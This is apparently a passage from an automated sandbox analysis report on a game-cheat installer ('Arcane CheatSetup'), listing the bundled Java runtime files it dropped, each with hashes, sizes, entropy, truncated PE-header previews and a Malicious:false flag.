                                SHA-512:624431A908C2A835F980391A869623EE1FA1F5A1A41F3EE08040E6395B8C11734F76FE401C4B9415F2055E46F60A7F9F2AC0A674604E5743AB8301DBADF279F2
                                Malicious:false
                                Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........tm....X...X...X.G.X...X.G.X...X.G.X...X.G.X...XR..X...X...X...X.l.X...X.l.X...X.G.X...X.l.X...XRich...X........PE..L...pPjW...........!................=..............o................................|.....@.........................0...K...|...d.......................@....... ......................................@...............4............................text.............................. ..`.rdata..X...........................@..@.data...............................@....rsrc...............................@..@.reloc.. ...........................@..B........................................................................................................................................................................................................................................................................................................................

                                C:\Program Files (x86)\Arcane Cheat\jre\bin\prism_sw.dll (copy)

                                Download File
                                Process:C:\Users\user\AppData\Local\Temp\is-R8U9P.tmp\Arcane CheatSetup.tmp
                                File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                Category:dropped
                                Size (bytes):86592
                                Entropy (8bit):6.686302444148156
                                Encrypted:false
                                SSDEEP:1536:/QsPinZd9lmzFRQnJ9sSpkWgVenAe7C3xWxNO3A4:lPE9lEmtpkj7eqWxNCA4
                                MD5:5E6DDF7CF25FD493B8A1A769EF4C78F7
                                SHA1:42748051176B776467A31885BB2889C33B780F2D
                                SHA-256:B9BEACA57BFF23C953917C0B2037351EF3334E6A9DE447DCA6542FE5C815BF9F
                                SHA-512:C47F742F064B99E5B9C2BDEAC97472D9D8C9466C9071E9799AF79F820199D9B30B198C33EF635F07A972B77475AFEA9E7417AA6335D22A7380E7B0E552869C18
                                Malicious:false
                                Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......!3.ueRr&eRr&eRr&...&gRr&eRs&ERr&h..&fRr&h..&oRr&h..&hRr&h..&gRr&.+.&nRr&.+.&dRr&h..&dRr&.+.&dRr&RicheRr&........PE..L...qPjW...........!................~..............o................................O.....@........................../..B...D4..<....p...............:..@.......\...................................0...@...............|............................text...4........................... ..`.rdata..*w.......x..................@..@.data...$....@....... ..............@..._RDATA.......`.......(..............@..@.rsrc........p.......0..............@..@.reloc..\............4..............@..B................................................................................................................................................................................................................................................................................

                                C:\Program Files (x86)\Arcane Cheat\jre\bin\resource.dll (copy)

                                Download File
                                Process:C:\Users\user\AppData\Local\Temp\is-R8U9P.tmp\Arcane CheatSetup.tmp
                                File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                Category:dropped
                                Size (bytes):14912
                                Entropy (8bit):6.381906222478272
                                Encrypted:false
                                SSDEEP:192:kNncquU+hyD13XLPVlD6o+N9F5os7USnYe+PjPriT0fwXF27:kNcWp7PVl67/nYPLr7s27
                                MD5:3C9DC0ED8ADD14A0E5B845C1ACC2FF2E
                                SHA1:25C395ADE02199BEDCEE95C65E088B758CD84435
                                SHA-256:367C552FBA3DA5F22791CF8F22B983871639ECD2EF7F5B1880021FE4C4F65EE4
                                SHA-512:4DD5F68180D03B6621E46732F04B47F996B96F91F67845538D1B303E598CCFDB5E4F785A76DE7DFCB8918125FDB06B9068C4EAB06984B5AA9224DCE90190BA1A
                                Malicious:false
                                Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......Z>Mg._#4._#4._#4.'.4._#4..4._#4..4._#4..4._#4._"4>_#4..4._#4..4._#4..4._#4..4._#4Rich._#4................PE..L...pPjW...........!......................... .....o.........................`.......>....@..........................%......\"..d....@..............."..@....P..D.... ...............................!..@............ ...............................text............................... ..`.rdata....... ......................@..@.data...`....0......................@....rsrc........@......................@..@.reloc.......P....... ..............@..B........................................................................................................................................................................................................................................................................................................................

                                C:\Program Files (x86)\Arcane Cheat\jre\bin\rmid.exe (copy)

                                Download File
                                Process:C:\Users\user\AppData\Local\Temp\is-R8U9P.tmp\Arcane CheatSetup.tmp
                                File Type:PE32 executable (console) Intel 80386, for MS Windows
                                Category:dropped
                                Size (bytes):15936
                                Entropy (8bit):6.466364086630595
                                Encrypted:false
                                SSDEEP:384:Gpss5cnn6vmSHhV8TI1ee84SzK8nYPLr7HuY:Gps7nnS/8Tte8tC7HuY
                                MD5:12B6E1C3205A8B17AC20E00A889DFC43
                                SHA1:42458CFA7135858ACEF10803B87A208FA7E66413
                                SHA-256:EAEA20A794EC6BB15808EF278376A87CF91F9BE15FE6A7DE92014AC4BF75555D
                                SHA-512:174703820636DED2BA081420A8D1E37D67FDA6C13AC406C2F08E16DCF0C7B7D9642E37BC888802B50ED3438D6029C4FECCD7C151B82CF9A91F13F36C4A0B2019
                                Malicious:false
                                Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........R%^.<v^.<v^.<vW..v\.<vEx.v_.<vEx.v\.<vEx.v[.<v^.=vo.<vEx.vJ.<vEx.v_.<vEx.v_.<vRich^.<v........PE..L....DjW............................|........ ....@..........................`......r.....@.................................4#..P....@..H............&..@....P....... ...............................!..@............ ...............................text............................... ..`.rdata....... ......................@..@.data........0......................@....rsrc...H....@......................@..@.reloc.......P.......$..............@..B........................................................................................................................................................................................................................................................................................................................................

                                C:\Program Files (x86)\Arcane Cheat\jre\bin\rmiregistry.exe (copy)

                                Download File
                                Process:C:\Users\user\AppData\Local\Temp\is-R8U9P.tmp\Arcane CheatSetup.tmp
                                File Type:PE32 executable (console) Intel 80386, for MS Windows
                                Category:dropped
                                Size (bytes):15936
                                Entropy (8bit):6.475930674615241
                                Encrypted:false
                                SSDEEP:384:GpsFG5BnK6xmSHhV8TCeeX4SzREnYPLr7Ggp:Gpsen0S/8TveXUC7jp
                                MD5:31C0CED43A07A2DFF3AFC557EBABBE0F
                                SHA1:9100A7393B919EB35C79CE16A559D783219E2F20
                                SHA-256:B93D0D62436D89C84C66ABBDCF817084A6BA01F7E10053C8F343DF5D53D37536
                                SHA-512:716818BBF6E4F21C2A627259F1D35E8375EFEF9C3B197B3AF6E10A4A1735CC643141C32270DF7F6FE25733517BE38CAA09205B98119996237E8EAE6A7D0825A7
                                Malicious:false
                                Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........R%^.<v^.<v^.<vW..v\.<vEx.v_.<vEx.v\.<vEx.v[.<v^.=vo.<vEx.vJ.<vEx.v_.<vEx.v_.<vRich^.<v........PE..L....DjW............................|........ ....@..........................`......84....@.................................D#..P....@..h............&..@....P....... ...............................!..@............ ...............................text............................... ..`.rdata....... ......................@..@.data........0......................@....rsrc...h....@......................@..@.reloc.......P.......$..............@..B........................................................................................................................................................................................................................................................................................................................................

                                C:\Program Files (x86)\Arcane Cheat\jre\bin\servertool.exe (copy)

                                Download File
                                Process:C:\Users\user\AppData\Local\Temp\is-R8U9P.tmp\Arcane CheatSetup.tmp
                                File Type:PE32 executable (console) Intel 80386, for MS Windows
                                Category:dropped
                                Size (bytes):15936
                                Entropy (8bit):6.475447140204412
                                Encrypted:false
                                SSDEEP:384:Gps85BnF26emSHhV8QM1eet4SzvBonYPLr7I:GpsGnFjS/8QBetJWC7I
                                MD5:43C1D1D0E248604CB3B643C0BDF4EC9A
                                SHA1:7BEE9DEB1E43F0FECF0FC57BDFD3F79CF048151F
                                SHA-256:165BFF317674BE33F2920320F3EF0957539E5BF149B673C2073DF48FF93A6D94
                                SHA-512:CAA9B14DF20FFF92CFC4F9A8557804FBD4CC02831824CD53AEAC7D0EE7918BBD50E22A69AB5FFC9E92A468A5201DF263707D373D60378817DC5FEFDE1ABC48BF
                                Malicious:false
                                Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........R%^.<v^.<v^.<vW..v\.<vEx.v_.<vEx.v\.<vEx.v[.<v^.=vo.<vEx.vJ.<vEx.v_.<vEx.v_.<vRich^.<v........PE..L....DjW............................|........ ....@..........................`.......t....@.................................D#..P....@..h............&..@....P....... ...............................!..@............ ...............................text............................... ..`.rdata....... ......................@..@.data........0......................@....rsrc...h....@......................@..@.reloc.......P.......$..............@..B........................................................................................................................................................................................................................................................................................................................................

                                C:\Program Files (x86)\Arcane Cheat\jre\bin\splashscreen.dll (copy)

                                Download File
                                Process:C:\Users\user\AppData\Local\Temp\is-R8U9P.tmp\Arcane CheatSetup.tmp
                                File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                Category:dropped
                                Size (bytes):177216
                                Entropy (8bit):6.909590121652277
                                Encrypted:false
                                SSDEEP:3072:L9Wyo+Jyru3w8WqWnJjOUrI7vh+Dug9PVWU+kmaVE9TBfQiJ8:BWyPsi34i+DugFj+kmaVE9TB4/
                                MD5:8DC2356E3FF3A595AEDE81594A2D259A
                                SHA1:A05E05E9EA8FB0C8928112CA931EB4F5E977B92A
                                SHA-256:B9DE5D3ABBC0AC956E7F590E4C8507FF570B6C353374BB80F413B5846CE322FE
                                SHA-512:D5C83EBDB7192DD361856B236A07AFD4FF95E68E0036396D68A3407ED680D4A36EC857AB101DBA5F583AA67CC45A2835178DAC84A68472C7F619EFA674FE51F0
                                Malicious:false
                                Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$....................8h....z.l.....8j.....8_......_......g.......h....8^......8o.....8n.....8i....Rich...........................PE..L...pPjW...........!...............................o......................................@.........................`...........P.......................@...........`...................................@...............D...|...@....................text............................... ..`.rdata..]...........................@..@.data....1..........................@....rsrc...............................@..@.reloc..............................@..B................................................................................................................................................................................................................................................................................................

                                C:\Program Files (x86)\Arcane Cheat\jre\bin\ssv.dll (copy)

                                Download File
                                Process:C:\Users\user\AppData\Local\Temp\is-R8U9P.tmp\Arcane CheatSetup.tmp
                                File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                Category:dropped
                                Size (bytes):473152
                                Entropy (8bit):5.475991416072106
                                Encrypted:false
                                SSDEEP:6144:ngmgmb+p19k+j4QJKFDSha+IJ6NyLu/wtAWvrMZp5WMuBzj:n17bsj4QJlha+XNyLu/iAWvhBzj
                                MD5:79CFE207E05F771E29847573593F6DE1
                                SHA1:34DFA813802C6F5A57A557BF72B2B306F8042E90
                                SHA-256:AEB27727F428116069944BB92B477D7487C9DEB3921E1005814536459E35222F
                                SHA-512:2C71A827BB156BD012BE20B30D701D5123D8B6C7889D4F4A47A483D3477C25BF224E7F205CA9FCCB08DA0A2EF28AF6433D018A0E555BCE911C31A5F462F41578
                                Malicious:false
                                Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......@.....@..@..@..4@..@.u2@..@.u.@..@../@..@..?@..@..@:.@k..@..@.u.@\.@.u7@..@.u6@..@.u1@..@Rich..@........PE..L...pPjW...........!.....^..........r .......p.....o.........................p............@.........................@D.......+...........s........... ..@.... ..H6...t..................................@............p.......).......................text...\\.......^.................. ..`.rdata.......p.......b..............@..@.data....I...P...*...8..............@....rsrc....s.......t...b..............@..@.reloc...H... ...J..................@..B................................................................................................................................................................................................................................................................................................................

                                C:\Program Files (x86)\Arcane Cheat\jre\bin\ssvagent.exe (copy)

                                Download File
                                Process:C:\Users\user\AppData\Local\Temp\is-R8U9P.tmp\Arcane CheatSetup.tmp
                                File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                Category:dropped
                                Size (bytes):52800
                                Entropy (8bit):6.367562931371078
                                Encrypted:false
                                SSDEEP:768:0UD9dxWf4b4UoY6sUsaJ2sQ7O+phclByW3T9KMDbgz2dN6lDb/9/YMw0c3D6QsTY:0IofovBbS9KMvHR0cz6QsTPOXm2BT9j7
                                MD5:F434A8AC7F1C8C0E2587B9A9F30E397B
                                SHA1:BD62E10E44117A60EB4180412112593D9460299D
                                SHA-256:6A994B389B8F7109238DE6F230B1B540186ED2EC8D081C7601C6996863AA4DC8
                                SHA-512:9896DAC36BD4F7289C7701B75AD8EB9F7ACD233384075A3FBA6E6F2F38E420F37C1A29317EEEA3C4DDBA1791F6F17187DD5BDFDD9F98F095E7D4DF20C0D5EA3E
                                Malicious:false
                                Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......Hi.m...>...>...>..u>...>.Fq>...>..w>...>..C>...>.pj>...>.pz>...>...>...>c~B>...>..B>...>..s>...>..t>...>Rich...>........PE..L....HjW.................f...R.......i............@.................................._....@.....................................x.......................@.......X...@...............................P...@...................`........................text....e.......f.................. ..`.rdata...5.......6...j..............@..@.data...............................@....rsrc...............................@..@.reloc..............................@..B................................................................................................................................................................................................................................................................................................................

                                C:\Program Files (x86)\Arcane Cheat\jre\bin\sunec.dll (copy)

                                Download File
                                Process:C:\Users\user\AppData\Local\Temp\is-R8U9P.tmp\Arcane CheatSetup.tmp
                                File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                Category:dropped
                                Size (bytes):123968
                                Entropy (8bit):6.699694377005066
                                Encrypted:false
                                SSDEEP:1536:jWi/SLhxEJKv0O4+zwtKg3HquHB2u0YUdRXGCDilgKptxG0ULtt1vtxgl0IlgqA2:+vdtg6ZYUniPe5vtxgl0IlgqA2
                                MD5:0BAB62A0CF67481EA2A7F3CAFD7C5144
                                SHA1:D6B010C815F4D9C675DF918B615FE0AAE45249EA
                                SHA-256:FC57682FDBCA50FAEBFC6B4F5D199FC407A541C110C15F0C850503006D32301A
                                SHA-512:0128813DE247246BF4AECE1B222B6611E5AE1EDE01A1B339CFE0F98184739D7A066DAE4F1A271F544BB39F9B79F053F4B96F2E471B9444C29855CF52FB7835CB
                                Malicious:false
                                Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......y..@=..=..=..4.1.?....:.<..&G>.>..=.....&G<.:..&G..>..&G.....&G9.<..&G8.<..&G?.<..Rich=..................PE..L...qPjW...........!.........................0.....p......................................@.........................p...:...\...<.......................@............0..................................@............0...............................text............................... ..`.rdata.......0......................@..@.data...............................@....rsrc...............................@..@.reloc..>...........................@..B................................................................................................................................................................................................................................................................................................................

                                C:\Program Files (x86)\Arcane Cheat\jre\bin\sunmscapi.dll (copy)

                                Download File
                                Process:C:\Users\user\AppData\Local\Temp\is-R8U9P.tmp\Arcane CheatSetup.tmp
                                File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                Category:dropped
                                Size (bytes):25664
                                Entropy (8bit):6.488681310308951
                                Encrypted:false
                                SSDEEP:384:GxZ2v7Oc56lspQEgde9M3z27lFOJIjkzIPV5yKlWFKbKwnYPLr7Wo5L:Xr5PQEOe9MD4lFhjk8ddeKWwC7dL
                                MD5:039AD8A7A4B14C321F156878838A2340
                                SHA1:6AD9D2FBA988193D16E7B3278C0D0757AB99B3EF
                                SHA-256:ED3AD7EBA989FB31C2ABC3220694D1446D33659782CB1B333318EC54A577389D
                                SHA-512:7D5B8C191A7D0C4FEDB831DE197A3CB5DC0564AD3F2E57EEE8C506B2308B656D2F0FE086D508FAB8F03CA0E1B0574E708728373DFA3116C9B9FC5DFDB72FEE46
                                Malicious:false
                                Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........O.............................;......V...............:..........................Rich....................PE..L...rPjW...........!.....(..."......h2.......@.....p.................................3....@.........................`O.......G..d....p...............L..@...........PA..............................8D..@............@..4............................text....&.......(.................. ..`.rdata..8....@.......,..............@..@.data...`....`.......B..............@....rsrc........p.......D..............@..@.reloc..^............H..............@..B........................................................................................................................................................................................................................................................................................................................

                                C:\Program Files (x86)\Arcane Cheat\jre\bin\t2k.dll (copy)

                                Download File
                                Process:C:\Users\user\AppData\Local\Temp\is-R8U9P.tmp\Arcane CheatSetup.tmp
                                File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                Category:dropped
                                Size (bytes):195136
                                Entropy (8bit):6.80727029211823
                                Encrypted:false
                                SSDEEP:3072:fmtIwyq6lFq857zCYLFYEVothL10xYOXjV5qECVTHLy71vJ2qIcWYEfQQxIYh5t+:mIwyqM7qYLVVIqhfqfTm1W+Tws
                                MD5:E1904A4B2D6F657B9FEF053893FE3C41
                                SHA1:59AC965A1029AE936DDD5AE623A9A025D49737EC
                                SHA-256:5929E3510F67FEAE073B8995BFC542FD7A0626F57D2FBC829EFC95206DF8F85F
                                SHA-512:C0A60928299EA2E6DC8AD1E3DE9CEF77C8E520585F8D73BD7F56E33705D1A2AEC04AE9C01A8069AE5A0D71F28AEF42F4A260CF4D5BB44A95DCEB70E5C8DB8FEA
                                Malicious:false
                                Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......`.zS$...$...$...-..&...?>..'...?>..!...$.......?>.. ...?>......?>..%...?>..%...?>..%...Rich$...................PE..L...pPjW...........!.....f...........p.............p......................... .......]....@.............................f...\...P.......................@...............................................@............................................text....e.......f.................. ..`.rdata..v[.......\...j..............@..@.data...............................@....rsrc...............................@..@.reloc..............................@..B........................................................................................................................................................................................................................................................................................................................

                                C:\Program Files (x86)\Arcane Cheat\jre\bin\tnameserv.exe (copy)

                                Download File
                                Process:C:\Users\user\AppData\Local\Temp\is-R8U9P.tmp\Arcane CheatSetup.tmp
                                File Type:PE32 executable (console) Intel 80386, for MS Windows
                                Category:dropped
                                Size (bytes):16448
                                Entropy (8bit):6.392776971200692
                                Encrypted:false
                                SSDEEP:384:GpssZwnvNmc6DDmSHhV8Ogee1cGPnYPLr7fl:GpssqnFm16S/8OVeLC7fl
                                MD5:7624A9B769CDCF3A75FE5A9FEAADD61F
                                SHA1:9269968968CD63D6E1ECC14F78B9A630FCC26FBE
                                SHA-256:41F9A804C888A58DECDE2B63A544DBFF536B40D87CECED197E1A14050858C0DA
                                SHA-512:1AF7BB30E1FC7600AD0A209DB4E077DAB9CEAA5C4332F8B1353ED0DB7EA71B4A9B7D126E756B634D3FB22618E39AFC5ED52263C88E9F7646EAABB0D9240E382B
                                Malicious:false
                                Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........R%^.<v^.<v^.<vW..v\.<vEx.v_.<vEx.v\.<vEx.v[.<v^.=vo.<vEx.vJ.<vEx.v_.<vEx.v_.<vRich^.<v........PE..L....DjW............................z........ ....@..........................`......n.....@..................................#..P....@..\............(..@....P....... ..............................."..@............ ...............................text............................... ..`.rdata..J.... ......................@..@.data........0......................@....rsrc...\....@......................@..@.reloc.......P.......&..............@..B........................................................................................................................................................................................................................................................................................................................................

                                C:\Program Files (x86)\Arcane Cheat\jre\bin\unpack.dll (copy)

                                Download File
                                Process:C:\Users\user\AppData\Local\Temp\is-R8U9P.tmp\Arcane CheatSetup.tmp
                                File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                Category:dropped
                                Size (bytes):65600
                                Entropy (8bit):6.461111208462538
                                Encrypted:false
                                SSDEEP:1536:lVeogiQWo3IzLIoDY9p6K/sdDAZ5e1x3afX:veDib4oDu4K/sdDAZ5CxEX
                                MD5:806580640A68234A711D3BB0642130A7
                                SHA1:1EDF20DAAC15FE90E9891E95130D0DD70D005B62
                                SHA-256:CCCC2A9F54E4F5961DD45DAA1F6C97ECFB156EA8E0DF82277A2C109EA4D2E036
                                SHA-512:0AAC087449DEECBB1CFAEE5C3144500CDC4C1D209D1F1F7D8EB41DD7870504BF71D0CC9AE7761BFC609F42273B7FB3CA7801AA54FB0E92BC71C41CC5CAECD31C
                                Malicious:false
                                Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........D.H%..H%..H%..A]).J%...k".I%..S.$.L%..S...D%..S.&.O%..H%..w%..S...A%..S.!.I%..S. .I%..S.'.I%..RichH%..........PE..L...pPjW...........!.........L.....................p......................... .......<....@.........................`...........d.......................@...........................................P...@............................................text............................... ..`.rdata..q-..........................@..@.data...............................@....rsrc...............................@..@.reloc..............................@..B........................................................................................................................................................................................................................................................................................................................

                                C:\Program Files (x86)\Arcane Cheat\jre\bin\unpack200.exe (copy)

                                Download File
                                Process:C:\Users\user\AppData\Local\Temp\is-R8U9P.tmp\Arcane CheatSetup.tmp
                                File Type:PE32 executable (console) Intel 80386, for MS Windows
                                Category:dropped
                                Size (bytes):159296
                                Entropy (8bit):6.019927381236816
                                Encrypted:false
                                SSDEEP:3072:9vFy5zbJEQFFB9AYeb11tzTQrTBfYEaf9zQ6NlUlh5:7iFry3b11twTBgEaf9zQ6Nc
                                MD5:C15F0FE651B05F4288CBC3672F6DC3CE
                                SHA1:FFCE84FE532B41F31CDDC41C84024FAFE6BC30E6
                                SHA-256:869DC4D40444F10325057B0CC3BB7EA48942DD712DF8A1AE331A554FF0397F1A
                                SHA-512:E9E27C4C68972E3250B380C1A5D5EB02BEC03028D389234A44A7D56974BFA233D177173F929BDB6FF877AE17A529D85D384684B0037E260A0143F7A95A0204C6
                                Malicious:false
                                Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......ar.:%..i%..i%..i,kKi'..i.]@i&..i>.Di&..i%..in..i>.Fi ..i>.ri8..i>.si,..i>.Bi$..i>.Ei$..iRich%..i........PE..L....DjW..........................................@..................................c....@..................................p..<....................V..@........... ...............................@6..@............q...............................text............................... ..`.rdata.............................@..@.data........P.......(..............@....idata..D....p.......8..............@....rsrc................B..............@..@.reloc...............J..............@..B........................................................................................................................................................................................................................................................................................

                                C:\Program Files (x86)\Arcane Cheat\jre\bin\verify.dll (copy)

                                Download File
                                Process:C:\Users\user\AppData\Local\Temp\is-R8U9P.tmp\Arcane CheatSetup.tmp
                                File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                Category:dropped
                                Size (bytes):39488
                                Entropy (8bit):6.751057397220933
                                Encrypted:false
                                SSDEEP:768:Okt1MVMrA9/Klzwz9UyCgMUt9onPs3h3nVt83OndMY7dmMpAnC70N:Oo1oMQ/CrPa3VWO+gdmMW6q
                                MD5:DE2167A880207BBF7464BCD1F8BC8657
                                SHA1:0FF7A5EA29C0364A1162A090DFFC13D29BC3D3C7
                                SHA-256:FD856EA783AD60215CE2F920FCB6BB4E416562D3C037C06D047F1EC103CD10B3
                                SHA-512:BB83377C5CFF6117CEC6FBADF6D40989CE1EE3F37E4CEBA17562A59EA903D8962091146E2AA5CC44CFDDDF280DA7928001EEA98ABF0C0942D69819B2433F1322
                                Malicious:false
                                Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......W.d....]...]...]...]...].H.]...].H.]...].H.]...]...]_..].H.]...].H.]...].H.]...].H.]...]Rich...]........................PE..L...pPjW...........!.....N...4.......W.......`.....p................................*k....@.................................<x..P.......................@...........Pa...............................v..@............`..<............................text....L.......N.................. ..`.rdata..e!...`..."...R..............@..@.data...(............t..............@....rsrc................v..............@..@.reloc...............z..............@..B................................................................................................................................................................................................................................................................................................................

                                C:\Program Files (x86)\Arcane Cheat\jre\bin\w2k_lsa_auth.dll (copy)

                                Download File
                                Process:C:\Users\user\AppData\Local\Temp\is-R8U9P.tmp\Arcane CheatSetup.tmp
                                File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                Category:dropped
                                Size (bytes):21568
                                Entropy (8bit):6.4868701533420925
                                Encrypted:false
                                SSDEEP:384:uVI9/tEAHVvfiqiW9LEiGTHb6hVXbS7fLsD5bGGNET7T7T7T7JyFoynPV5hgGLVt:uVI9/yA9f1iW9LEiGTHb6hVXbS7QbGG9
                                MD5:7C2959F705B5493A9701FFD9119C5EFD
                                SHA1:5A52D57D1B96449C2B40A82F48DE2419ACA944C3
                                SHA-256:596F89E7E5D9AC2B1F97FA36A20A7405C1CC41A9FCBA96DB089ADA4550131B24
                                SHA-512:B7B48BD14701F75B9018BEDEE5A4CFCEBDAC342F83339FB3F1EFB7855598474C9D1CC993B5D4ADD3326140435087D2BD7CBBC18BC76C64EAD6234A9A7D57C552
                                Malicious:false
                                Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......D..3..`..`..`.E.`..`.E.`..`.E `..`...`..`..`2.`.E!`..`.E.`..`.E.`..`.E.`..`Rich..`........................PE..L...pPjW...........!.........".......#.......0.....p.................................h....@.........................@B.......<..x....`...............<..@....p.......0...............................;..@............0...............................text............................... ..`.rdata..6....0......................@..@.data........P.......2..............@....rsrc........`.......4..............@..@.reloc..&....p.......8..............@..B................................................................................................................................................................................................................................................................................................................

                                C:\Program Files (x86)\Arcane Cheat\jre\bin\wsdetect.dll (copy)

                                Download File
                                Process:C:\Users\user\AppData\Local\Temp\is-R8U9P.tmp\Arcane CheatSetup.tmp
                                File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                Category:dropped
                                Size (bytes):163904
                                Entropy (8bit):6.508553433039132
                                Encrypted:false
                                SSDEEP:3072:onzJtwzsrYx6cY+90AiVrM5muIqltkt7maRoM/X1fJqO0NJT:onttwzsrYxTaVVY5muIq3mx/X1fcb
                                MD5:A63387A1BFDF760575B04B7BFD57FF89
                                SHA1:9384247599523D97F40B973A00EE536848B1D76F
                                SHA-256:5DF5B7E6EFCC345DDC8448AFC707B666F5F696F554B00ACA64D8E23EDBC176BF
                                SHA-512:CB3A6A394424345FFA076E0BE58F284A0E4DB6FBFCE02D93FB4871D350A7FA1E673175AE988C26453DB1C983C0D06A01DD413DE47031BB4BF308CAAF3513C36F
                                Malicious:false
                                Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........5...T.^.T.^.T.^..)^.T.^../^.T.^...^&T.^.".^.T.^.,2^.T.^.,"^.T.^.T.^MT.^...^.T.^..*^.T.^..+^.T.^..,^.T.^Rich.T.^................PE..L...rPjW...........!...............................p......................................@.................................D........p..P............h..@.......d...................................P...@.......................@....................text............................... ..`.rdata...d.......f..................@..@.data...`@... ..."..................@....rsrc...P....p.......(..............@..@.reloc..~/.......0...8..............@..B........................................................................................................................................................................................................................................................................................................

                                C:\Program Files (x86)\Arcane Cheat\jre\bin\zip.dll (copy)

                                Download File
                                Process:C:\Users\user\AppData\Local\Temp\is-R8U9P.tmp\Arcane CheatSetup.tmp
                                File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                Category:dropped
                                Size (bytes):69696
                                Entropy (8bit):6.89860109289213
                                Encrypted:false
                                SSDEEP:1536:ZCghp1EJqcGdjandlraksIOwIOpVnToIft4tpgO6:/142jUhimp9TBft4tqO6
                                MD5:CB99B83BBC19CD0E1C2EC6031D0A80BC
                                SHA1:927E1E24FD19F9CA8B5191EF3CC746B74AB68BCD
                                SHA-256:68148243E3A03A3A1AAF4637F054993CB174C04F6BD77894FE84D74AF5833BEC
                                SHA-512:29C4978FA56F15025355CE26A52BDF8197B8D8073A441425DF3DFC93C7D80D36755CC05B6485DD2E1F168DF2941315F883960B81368E742C4EA8E69DD82FA2BA
                                Malicious:false
                                Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$..........H....................2.................4.....................5.............................Rich............PE..L...pPjW...........!.........h.....................p.........................0......V.....@.................................L...d.......................@.... ..X...0...................................@............................................text............................... ..`.rdata..wV.......X..................@..@.data...............................@....rsrc...............................@..@.reloc....... ......................@..B........................................................................................................................................................................................................................................................................................................................

                                C:\Program Files (x86)\Arcane Cheat\jre\is-5391N.tmp

                                Download File
                                Process:C:\Users\user\AppData\Local\Temp\is-R8U9P.tmp\Arcane CheatSetup.tmp
                                File Type:ASCII text, with very long lines (427), with CRLF line terminators
                                Category:dropped
                                Size (bytes):533
                                Entropy (8bit):5.416086012521588
                                Encrypted:false
                                SSDEEP:12:GEKkc58IOlBVAQEjy2IM0oPP1RVtc8fFVKeiIdGIVIPJvq1RUbDcz:GEK7586QY/0oPtRb2TqySRUkz
                                MD5:A61B1E3FE507D37F0D2F3ADD5AC691E0
                                SHA1:8AE1050FF466B8F024EED5BC067B87784F19A848
                                SHA-256:F9E84B54CF0D8CB0645E0D89BF47ED74C88AF98AC5BF9CCF3ACCB1A824F7DC3A
                                SHA-512:3E88A839E44241AE642D0F9B7000D80BE7CF4BD003A9E2F9F04A4FEB61EC4877B2B4E76151503184F4B9978894BA1D0DE034DBC5F2E51C31B3ABB24F0EACF0C7
                                Malicious:false
                                Preview:JAVA_VERSION="1.8.0_101"..OS_NAME="Windows"..OS_VERSION="5.1"..OS_ARCH="i586"..SOURCE=" .:e983a19c6439 corba:2bb2aec4b3e5 deploy:2390a2618e98 hotspot:77df35b662ed hotspot/make/closed:40ee8a558775 hotspot/src/closed:710cffeb3c01 hotspot/test/closed:d6cfbcb20a1e install:68eb511e9151 jaxp:8ee36eca2124 jaxws:287f9e9d45cc jdk:827b2350d7f8 jdk/make/closed:53a5d48a69b0 jdk/src/closed:06c649fef4a8 jdk/test/closed:556c76f337b9 langtools:8dc8f71216bf nashorn:44e4e6cbe15b pubs:388b7b93b2c0 sponsors:1b72bbdb30d6"..BUILD_TYPE="commercial"..

                                C:\Program Files (x86)\Arcane Cheat\jre\is-JM49M.tmp

                                Download File
                                Process:C:\Users\user\AppData\Local\Temp\is-R8U9P.tmp\Arcane CheatSetup.tmp
                                File Type:ISO-8859 text, with CRLF line terminators
                                Category:dropped
                                Size (bytes):3313
                                Entropy (8bit):4.557128068430301
                                Encrypted:false
                                SSDEEP:96:a58tiSm9iicC7CRRS9i7cq11iUDcsMLks0h9n:WOi59rcF/Cigq11iUD5MLks0z
                                MD5:FC605D978E7825595D752DF2EF03F8AF
                                SHA1:C493C9541CAAEE4BFE3B3E48913FD9DF7809299F
                                SHA-256:7D697EAA9ACF50FE0B57639B3C62FF02916DA184F191944F49ECA93D0BB3374F
                                SHA-512:FB811DE6A2B36B28CA904224EA3525124BD4628CA9618C70EB9234AB231A09C1B1F28D9B6301581A4FA2E20F1036D5E1C3D6F1BF316C7FE78EF6EDEAE50EA40E
                                Malicious:false
